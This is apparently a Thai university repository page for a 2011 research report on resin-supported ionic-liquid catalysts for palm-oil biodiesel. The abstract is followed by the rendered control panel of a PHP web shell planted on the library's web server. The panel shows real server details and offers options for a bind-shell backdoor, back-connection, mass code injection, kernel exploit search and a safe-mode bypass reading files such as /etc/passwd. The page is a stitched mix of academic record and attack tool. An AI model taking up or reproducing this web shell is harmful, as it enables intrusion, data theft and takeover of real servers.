การสังเคราะห์เรซินเป็นตัวเร่งปฏิกิริยาในการผลิตไบโอดีเซล.

Titleการสังเคราะห์เรซินเป็นตัวเร่งปฏิกิริยาในการผลิตไบโอดีเซล.
Publication TypeResearch
Year of Publication2554
Authorsเอกรัฐ ศรีสุข., อุทัยวรรณ ศิริอ่อน., Ekaruth Srisook., Uthaiwan Siriou.
Corporate Authorsคณะวิทยาศาสตร์.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi)
Typeงานวิจัย.
Keywordsชื้อเพลิงไบโอดีเซล - - การผลิต., ตัวเร่งปฏิกิริยา., สาขาวิทยาศาสตร์เคมีและเภสัช., สารประกอบอินทรีย์ - - การสังเคราะห์., เรซิน., เรซินสังเคราะห์.
Abstractในงานวิจัยนี้ได้สังเคราะห์ตัวเร่งปฏิกิริยาแบบไม่เป็นสถานะเดียวกับสารตั้งต้น (Heterogeneous catalysts) โดยนำของเหลวไอออนิกซึ่งประกอบด้วย imidazolium ที่มีหมู่แทนที่แตกต่างกันและประจุลบต่าง ๆเช่น HSO4 และ P-TsO ยึดเกะบน Merrifield's resin จากนั้นนำมาวิเคราะห์โครงสร้างด้วยเทคนิค Fourier transform infrared (FT-IR) spectroscopy และ Energy dispersive spectroscopy (EDX) ตัวเร่งปฏิกิริยาที่เตรียมได้ถูกนำมาทดสอบประสิทธิภาพในการเร่งปฏิกิริยาทรานส์เอสเทอริฟิเคชั่นของน้ำมันปาล์มกับเมทานอลเพื่อผลิตไบโอดีเซล พบว่า 1-(4-sulfonic acid) butyllimidazolium toluene sulfonic acid ที่ยึดเกาะ Merrifield's resin (E16) มีประสิทธิภาพในการเร่งปฏิกิริยาดีที่สุด โดยร้อยละของผลิตภัณฑ์ที่ได้คือ 66 ซึ่งให้ผลดีพอ ๆกับใช้ H2SO4 เป็นตัวเร่งปฏิกิริยาในการแยกไบโอดีเซลออกจากปฏิกิริยาทำได้โดยการกรองอย่างง่าย In this study heterogeneous catalysts were synthesized by Immobilization of ionic liquids with various derivative imidazolium and various anions included HSO4, p-TsO. These were characterized using Fourier transform infrared (FT-IR) spectroscopy and Energy dispersive spectroscopy (EDX). They were used as catalysts for transesterification of palm oil with methanol to biodiesel. Merrifield's resin supported 1-(4-sulfonic acid) butyllimidazolium toluene sulfonic acid (E16) showed the best of catalytic activity, Biodiesel yield achieved 66% .The catalytic activity of E 16 was nearly the same as the of concentrated sulfuric acid. The separation of the biodiesel can be performed by simple filtration.
Research Notesได้รับเงินอุดหนุนการวิจัยจากงบประมาณเงินรายได้ (อุดหนุนรัฐบาล) ประจำปี 2554 มหาวิทยาลัยบูรพา
Alternate TitleSynthesis of resin as catalyst in biodiesel production.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 264 GB of 389.83 GB (67.72%)Server IP: 10.32.1.15 - Your IP: 54.89.6.219

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0286 ]:.